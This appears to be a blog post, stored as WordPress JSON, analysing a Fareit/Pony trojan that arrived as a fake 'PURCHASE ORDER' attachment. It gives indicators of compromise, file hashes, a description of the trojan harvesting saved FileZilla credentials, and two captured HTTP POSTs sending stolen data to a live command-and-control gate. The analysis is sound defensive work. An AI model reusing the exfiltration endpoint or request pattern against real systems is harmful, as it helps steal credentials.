{"id":654,"date":"2017-01-05T14:31:39","date_gmt":"2017-01-05T14:31:39","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=654"},"modified":"2017-01-05T14:31:39","modified_gmt":"2017-01-05T14:31:39","slug":"2017-01-05-fareitpony-malware-from-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=654","title":{"rendered":"2017-01-05 Fareit\/Pony Malware from Malspam"},"content":{"rendered":"

Happy New Years to everyone! Hope that everyone had a great holiday break. For the first post of the year, here is an example of a Fareit\/Pony (Suricata) or Phoenix\/Zeus (Snort) trojan that I was able to find in the email filters. For more information about this malware please check out Fortinet’s post about it here<\/a>. Like usual, the artifacts from this investigation can be found over in my Github repo here<\/a>.<\/p>\n

\"\"<\/a><\/p>\n

Indicator(s) of Compromise
\n=========================
\n62.108.34.152 \/ ssstpc.usa.cc (Port 80)<\/p>\n

Artifacts from Investigation
\n=============================
\nFile name: PURCHASE ORDER.gz
\nFile size: 117KB
\nMD5 hash: 83e493c4330bf53196d1ebfc1c9631f3
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/b42a61b173e07385bfe0ae34153b61538ec916484f1653144223d63dee8cfc4e\/analysis\/<\/a>
\nDetection ratio: 14 \/ 56
\nFirst detected: 2017-01-05 09:09:07 UTC <\/p>\n

File name: PURCHASE ORDER.exe
\nFile size: 243KB
\nMD5 hash: 3d2a7f82b9590e1b5e55bf3b5bc8ee53
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/4c7bb06f3887399d77ac6af9d67b32b7838170c635b5f85feca73b7d35c4d8a6\/analysis\/<\/a>
\nDetection ratio: 15 \/ 56
\nFirst detected: 2017-01-05 09:00:51 UTC<\/p>\n

File name: svhost.exe
\nFile size: 52KB
\nMD5 hash: 278edbd499374bf73621f8c1f969d894
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/c6999b9f79932c3b4f1c461a69d9dc8dc301d6a155abc33efe1b6e9e4a038391\/analysis\/<\/a>
\nDetection ratio: 0 \/ 56
\nFirst detected: 2011-03-12 15:50:25 UTC<\/p>\n

Analysis of Malware
\n====================
\nOnce the user downloads, saves, and extracts the attachment from the email, they are left with a folder called “PURCHASE ORDER” with the “PURCHASE ORDER.exe” file inside. Once the user executes this binary, the binary unpacks what looks to be a valid “svchost.exe” in the C:\\Users\\%username%\\AppData\\Local\\Temp folder and starts running that. After a minute or so, both the “PURCHASE ORDER.exe” and “svchost.exe” terminate and the system is returned to normal state. From the network side of things, we can see that there is a single call the malicious domain with a simple POST and no other traffic (and not other malicious files being downloaded\/left on the system).<\/p>\n

\r\nPOST \/ml\/vrs\/slyr\/pny\/panel\/gate.php HTTP\/1.0\r\nHost: ssstpc.usa.cc\r\nAccept: *\/*\r\nAccept-Encoding: identity, *;q=0\r\nContent-Length: 10735\r\nConnection: close\r\nContent-Type: application\/octet-stream\r\nContent-Encoding: binary\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Thu, 05 Jan 2017 11:51:10 GMT\r\nServer: Apache\/2.2.31 (Unix)\r\nX-Powered-By: PHP\/5.5.38\r\nConnection: close\r\nContent-Type: text\/html; charset=windows-1251\r\n\r\nSTATUS-IMPORT-OK<\/pre>\n
Looking at this a little closer with Process Monitor, I could see that the “svchost.exe” process was scanning the registry and file system looking for different software and certain files within those folders (ie: Filezilla in the screen shot below). Since this is along the Fareit\/Zeus family of malware, it is obvious that it is looking for any saved credentials in application files or registry settings. <\/p>\n
\"\"<\/a><\/p>\n
After it completes scanning the system, it closes the “svchost.exe” file and then performs the DNS query for the malicious domain to POST the data back as seen above from the PCAP.<\/p>\n
\"\"<\/a><\/p>\n
At this point I was curious what things would look like if there was something saved on the system. So I wiped the VM and installed Filezilla Client and saved some dummy information in it and re-ran the malware. The results look about the same as you can see below.<\/p>\n
\"\"<\/a><\/p>\n
\r\nPOST \/ml\/vrs\/slyr\/pny\/panel\/gate.php HTTP\/1.0\r\nHost: ssstpc.usa.cc\r\nAccept: *\/*\r\nAccept-Encoding: identity, *;q=0\r\nContent-Length: 19307\r\nConnection: close\r\nContent-Type: application\/octet-stream\r\nContent-Encoding: binary\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Thu, 05 Jan 2017 13:17:37 GMT\r\nServer: Apache\/2.2.31 (Unix)\r\nX-Powered-By: PHP\/5.5.38\r\nConnection: close\r\nContent-Type: text\/html; charset=windows-1251\r\n\r\nSTATUS-IMPORT-OK<\/pre>\n
The two things to notice here are 1) in the Process Montior output, the “svchost.exe” process is now able to read the Filezilla files where before it could not, and 2) the “Content-Length” in the second PCAP is larger than the initial one (10735 versus 19307).<\/p>\n","protected":false},"excerpt":{"rendered":"
Happy New Years to everyone! Hope that everyone had a great holiday break. For the first post of the year, here is an example of a Fareit\/Pony (Suricata) or Phoenix\/Zeus (Snort) trojan that I was able to find in the email filters. For more information about this malware please check out Fortinet’s post about it here. Like usual, the artifacts from this investigation can be found over in my Github repo here. Indicator(s) of Compromise ========================= 62.108.34.152 \/ ssstpc.usa.cc (Port 80) Artifacts from Investigation ============================= File name: PURCHASE ORDER.gz File size: 117KB MD5 hash: 83e493c4330bf53196d1ebfc1c9631f3 Virustotal: http:\/\/www.virustotal.com\/en\/file\/b42a61b173e07385bfe0ae34153b61538ec916484f1653144223d63dee8cfc4e\/analysis\/ Detection ratio: 14…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-654","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/654","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=654"}],"version-history":[{"count":1,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/654\/revisions"}],"predecessor-version":[{"id":659,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/654\/revisions\/659"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=654"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=654"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=654"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}